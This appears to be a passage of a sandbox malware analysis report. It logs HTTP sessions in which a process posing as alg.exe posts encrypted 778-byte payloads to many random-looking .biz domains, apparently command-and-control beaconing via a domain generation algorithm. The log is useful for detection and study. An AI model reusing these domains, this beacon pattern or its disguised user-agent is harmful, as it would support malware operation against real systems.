Dec 31, 2024 09:06:13.077657938 CET	350	OUT	POST /rbdfcj HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: gytujflc.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Dec 31, 2024 09:06:13.077694893 CET	778	OUT	Data Raw: f5 30 19 7d 24 27 e8 37 fe 02 00 00 e8 88 7d b8 16 7a fa 1a 02 c7 25 ad 57 29 da 57 fd 02 79 4c b4 ec 6d 6a d0 91 7c 4d f4 ad 0b 97 55 b5 9d aa 2e 04 49 39 5d 82 33 b0 c0 60 a0 f5 0f 40 14 3e df 89 15 81 29 2e 28 e4 c8 94 de e7 ba 72 b4 e9 30 1a Data Ascii: 0}$'7}z%W)WyLmj\|MU.I9]3`@>).(r0)8rC' i,p5f&4G[`wGDpHd;h.u~\|V]~(\C`TZiWv/3J@EP!n_XJS[!\3~y!8A%
Dec 31, 2024 09:06:13.193420887 CET	744	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Tue, 31 Dec 2024 08:06:13 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49859	13.251.16.150	80	7304	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:06:13.457752943 CET	345	OUT	POST /rss HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: qaynky.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Dec 31, 2024 09:06:13.457767963 CET	778	OUT	Data Raw: 85 85 c7 2f a0 bd ca 67 fe 02 00 00 3b ea 95 4f e3 a0 02 9c 4e c0 ce 36 80 44 8f a9 ef 0b fe 4d 7d 00 a3 97 94 ca 0f be dc b8 08 44 7f 99 ab 11 57 4c de a1 ba fc 52 96 bb 38 6e d0 90 8b 6e 7b a5 28 01 d4 88 ff e2 8d b9 74 63 68 82 85 59 82 3b 18 Data Ascii: /g;ON6DM}DWLR8nn{(tchY;~$pnaOl)7bR7' Kwng;$\|5c?0a+Y8=~l0,~vHXhZ:Vyh~z!iB3/9OYVi_$@"E3w
Dec 31, 2024 09:06:14.906455994 CET	410	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2024 08:06:14 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=b91a228ed90582a62f6ad45c83bc9373\|8.46.123.189\|1735632374\|1735632374\|0\|1\|0; path=/; domain=.qaynky.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49871	44.221.84.105	80	7304	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:06:15.147855997 CET	354	OUT	POST /vnlfrtbjm HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: bumxkqgxu.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Dec 31, 2024 09:06:15.147881985 CET	778	OUT	Data Raw: 8b 1d c2 b3 6f 00 b0 6b fe 02 00 00 97 bd 27 06 0c 77 a7 55 93 d9 45 98 eb 02 f1 20 ab 25 64 3b df 5d 06 4d 14 65 cd c1 b3 19 21 e7 6f b3 95 8d 43 73 a7 b6 a2 9a 65 a7 9c 28 fd 71 3f e8 b1 e3 7b a6 84 a4 d4 1a 7b 29 29 4d d6 d2 39 eb 54 39 1f 9c Data Ascii: ok'wUE %d;]Me!oCse(q?{{))M9T9J.v{HGOXlO=9^h)"Ia2h_?PXuluI;~A*4?f-4Wv[}mAAN3WhS"$IhzGiOwZ:W%Ig\}nC`sJBK
Dec 31, 2024 09:06:15.611007929 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2024 08:06:15 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=69b1b01d1135f6af57f39e3d21f29c24\|8.46.123.189\|1735632375\|1735632375\|0\|1\|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49876	54.244.188.177	80	7304	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:06:15.879801989 CET	356	OUT	POST /lcaecfwoxcmb HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: dwrqljrr.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Dec 31, 2024 09:06:15.879898071 CET	778	OUT	Data Raw: fe 58 88 70 c0 67 98 c7 fe 02 00 00 e1 68 c7 b2 a9 e7 8b 23 53 8d 52 35 cc 85 a2 4c 7e e3 df 25 09 16 22 d1 80 cd fb 40 af f6 6a d5 d1 74 4b 26 3e 81 16 f1 49 e9 5d 7d b0 16 27 f5 04 ac 3e 76 24 6e be bb 00 6e 0a 46 7d e4 e4 ec d4 30 7b fc 34 c0 Data Ascii: Xpgh#SR5L~%"@jtK&>I]}'>v$nnF}0{4}?e"TF@oT_`PhK[_OT,?h&rB4JM;W5d39Z@O b( G6>vZn5.n#RN_3r6h'g"ST
Dec 31, 2024 09:06:16.579987049 CET	412	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2024 08:06:16 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=64382f523b8c4a15ca8f1e6dcfdb284e\|8.46.123.189\|1735632376\|1735632376\|0\|1\|0; path=/; domain=.dwrqljrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49883	35.164.78.200	80	7304	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:06:16.779573917 CET	351	OUT	POST /okuqeyemp HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: nqwjmb.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Dec 31, 2024 09:06:16.779587030 CET	778	OUT	Data Raw: d8 07 51 e1 1d 13 e1 52 fe 02 00 00 dd db 63 08 d0 e6 2e 94 69 6e 45 34 09 e6 04 e2 36 ba 18 f0 64 01 85 fe 36 c6 9d 5f ca be 6c 19 67 d0 12 b9 bc 64 19 79 3d e3 bf c5 bb 5c d1 93 3e 5e 7e ae 78 07 1f cb 7a fa c4 1d 37 27 97 6b 80 5b 31 4e c4 a0 Data Ascii: QRc.inE46d6_lgdy=\>^~xz7'k[1N$"w:b.$A1+\|0WoHxxXy>\|3vE^0X\|`bBQJwxX":S-g";-8Ry?!$qdr6O0
Dec 31, 2024 09:06:17.510077953 CET	410	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2024 08:06:17 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=23e283f4e084634ecf5fe29f765f49cd\|8.46.123.189\|1735632377\|1735632377\|0\|1\|0; path=/; domain=.nqwjmb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49891	3.94.10.34	80	7304	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:06:17.916960955 CET	348	OUT	POST /lwt HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ytctnunms.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Dec 31, 2024 09:06:17.916976929 CET	778	OUT	Data Raw: 7d a4 57 bc 45 f1 c6 ac fe 02 00 00 e7 82 0b 88 7c c4 8a 1c fb b4 51 63 c4 60 e0 87 38 e7 e4 a1 b2 a3 d0 1c cd c4 56 51 46 42 c2 a8 fc 7d 3d 0e 79 24 94 31 88 fa 6b d2 52 b3 a8 f4 60 47 17 6c f7 43 d1 dc d1 17 51 53 5a 2d f4 af ea 43 2a f0 d4 c8 Data Ascii: }WE\|Qc`8VQFB}=y$1kR`GlCQSZ-C:b-VnCou\g5]1d(]}/#+i$p^+:UCq@2eYee@[RzGkw__slG0lJ{A_#kO
Dec 31, 2024 09:06:18.390219927 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2024 08:06:18 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=e749ab8a7b6ce78f758cd10eb83f3a31\|8.46.123.189\|1735632378\|1735632378\|0\|1\|0; path=/; domain=.ytctnunms.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49895	165.160.13.20	80	7304	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:06:18.630624056 CET	357	OUT	POST /ydgyvfihkfuxmwlx HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: myups.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Dec 31, 2024 09:06:18.630673885 CET	778	OUT	Data Raw: f2 f7 1f ae dd ec 5b ef fe 02 00 00 c2 5b f3 9e e0 a1 ea e4 72 a5 d3 a1 f3 e5 8f 6d e8 ef 6a 40 7f 74 58 96 1a ba 26 01 8c 23 3a c6 07 94 05 07 61 94 21 78 e8 f2 88 01 ed 20 39 ea d5 ee 6b 7a cf f6 3e dc 7c a9 0f f6 0a de 12 dc af 5d 4f c3 48 51 Data Ascii: [[rmj@tX&#:a!x 9kz>\|]OHQ$E'JQ{yet9mZ'tRU`}bbY)lMRSvt;T)$4.)R7k>ClI+xF\|,]yxCO5/f0C
Dec 31, 2024 09:06:19.381952047 CET	170	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 08:06:19 GMT Content-Length: 94 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>
Dec 31, 2024 09:06:19.425441980 CET	342	OUT	POST /l HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: myups.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Dec 31, 2024 09:06:19.425476074 CET	778	OUT	Data Raw: 50 8d d2 80 b2 5b d1 8d fe 02 00 00 63 e2 c4 c5 ff bd 33 0d f1 39 8d 4e 2c cd 05 70 32 a7 c3 7c 05 c2 02 d4 77 5b e1 b6 3d 10 1d 63 b0 f8 84 60 3c d4 4b 6e c1 f9 2e 6a 1a f8 75 c5 30 1d d9 0e b9 a0 2a eb bb e1 a4 41 8a b1 c8 9e 54 a6 64 d5 ca 89 Data Ascii: P[c39N,p2\|w[=c`<Kn.ju0*ATdS9$!4wF`P#Uagy[U\|d;^tqe)x8=5RYpB["C9f7(BdmpLHs5Y/qmX1 /ZA}? x
Dec 31, 2024 09:06:19.607393026 CET	170	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 08:06:19 GMT Content-Length: 94 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49910	54.244.188.177	80	7304	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:06:20.843485117 CET	354	OUT	POST /vcdhvtdni HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: oshhkdluh.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Dec 31, 2024 09:06:20.843498945 CET	778	OUT	Data Raw: d3 a3 26 79 db d0 15 8c fe 02 00 00 75 cc 60 33 2f 00 2c 0f d4 6b bd 52 cf 58 01 1b bb b2 9d 97 fe 5c 29 52 db f8 bb ff 8c d6 7d 38 e2 70 65 9b 5c 06 ff 8a 68 4d b4 ad 64 b8 cb b0 d0 ea 54 21 82 94 b9 23 d0 0b cd 87 73 80 7c 34 c9 99 c7 d7 4f 50 Data Ascii: &yu`3/,kRX\)R}8pe\hMdT!#s\|4OP$d~hGe}3h.WPu@9f42Hph,p`g/Qk!{hl<d9;d(PJ=+#R,X2)^Tjs}9Up*^;Dbw9RYr
Dec 31, 2024 09:06:21.574311972 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2024 08:06:21 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=c81ba6408f4898da30c42cd2ab59f723\|8.46.123.189\|1735632381\|1735632381\|0\|1\|0; path=/; domain=.oshhkdluh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49916	208.117.43.225	80	7304	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:06:21.965406895 CET	354	OUT	POST /pjpssoyxmlc HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: yunalwv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Dec 31, 2024 09:06:21.965450048 CET	778	OUT	Data Raw: 79 40 2c 54 03 ae f9 e6 fe 02 00 00 39 6a c4 2d 2b c1 fc 0a 8f 44 34 1a 78 bd a3 67 48 92 6a 87 2e f0 4b fe 45 8f 00 24 68 d0 a6 dc f1 4b 1e 4e 68 9a d2 13 46 64 7d d1 bd ae 9c bd 7c ad 4a 2e 0f 39 63 d2 2d b7 f3 ee 18 d6 c6 a4 74 bc bd c3 e3 7c Data Ascii: y@,T9j-+D4xgHj.KE$hKNhFd}\|J.9c-t\|MGsFL8U~Ykx`DXWEfjIv2fSg\|S'H*3maW6ars]Pkxs)=LUT-ZggVy(yoXm`/
Dec 31, 2024 09:06:22.477936029 CET	744	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Tue, 31 Dec 2024 08:06:22 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Dec 31, 2024 09:06:22.525209904 CET	347	OUT	POST /pcyu HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: yunalwv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Dec 31, 2024 09:06:22.525211096 CET	778	OUT	Data Raw: 73 92 e2 dd 5b ff 68 23 fe 02 00 00 e8 80 06 55 60 d6 84 15 e8 ff 5e 6d 2d b8 87 cd 8c 8b a5 8e f4 e1 b6 0d cc 9f 9c 9f 63 7d 0c 22 b3 31 7b 9a 15 27 14 64 07 77 a1 14 3a 3c a9 40 58 3e f5 ae 76 f4 77 e1 a7 a2 62 46 01 5c e4 bf 40 0e c5 9e 0a 45 Data Ascii: s[h#U`^m-c}"1{'dw:<@X>vwbF\@E)0nJf_lD4!_1b^GXoR 2@e,,R>70k9H/>Xw<uI8m&&?t,J#.HVUe!l5HVzXS
Dec 31, 2024 09:06:22.644244909 CET	744	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Tue, 31 Dec 2024 08:06:22 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49927	18.246.231.120	80	7304	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:06:23.814193964 CET	355	OUT	POST /kwsxhlpkribwfg HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: jpskm.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Dec 31, 2024 09:06:23.814219952 CET	778	OUT	Data Raw: 92 2f fa 21 c4 86 72 83 fe 02 00 00 21 b2 21 41 a6 5e 0c ba 9c 32 0d 4d 80 c0 a2 16 4c de e1 b0 f8 02 e7 94 14 ba b1 32 f9 aa fd 1c 43 1c 78 fc 0b 37 91 66 5c 82 b1 ce e7 37 c6 ca 96 6a ae 73 67 f2 15 d0 93 ef 60 b6 de 1d 14 92 9d f5 b4 6b db 42 Data Ascii: /!r!!A^2ML2Cx7f\7jsg`kB&KJ\|Q8 [LpF_5TSwXD//x{R4QUx4B_9K\|&)tBN,}xB9Tw5HiYMd$@
Dec 31, 2024 09:06:24.525293112 CET	409	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2024 08:06:24 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=c4858ad0712d5d6bfc9c218b3f8692b1\|8.46.123.189\|1735632384\|1735632384\|0\|1\|0; path=/; domain=.jpskm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49938	54.244.188.177	80	7304	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:06:25.105933905 CET	356	OUT	POST /lutwptrdxtxh HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: lrxdmhrr.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Dec 31, 2024 09:06:25.106216908 CET	778	OUT	Data Raw: 66 65 b6 87 bc 53 5c 8a fe 02 00 00 1f 92 57 9d 37 2d 35 68 72 4a 8b f7 5c 6d f9 45 1d 9d c0 33 8d 95 4d 50 2e 3c 7a 94 bc 3f de ce fe 91 92 fd fe de eb 99 ee 89 40 58 0a 9f 40 2a bf d1 21 b9 f0 66 f0 af 01 28 35 53 4c 51 90 1c 81 2e 27 fc 75 46 Data Ascii: feS\W7-5hrJ\mE3MP.<z?@X@!f(5SLQ.'uFg5ukPy":q(M?qJc/+B?ywO2}RG}kES&w^4 .X-QHPXuM=z.ng

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	50050	54.244.188.177	80	7304	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
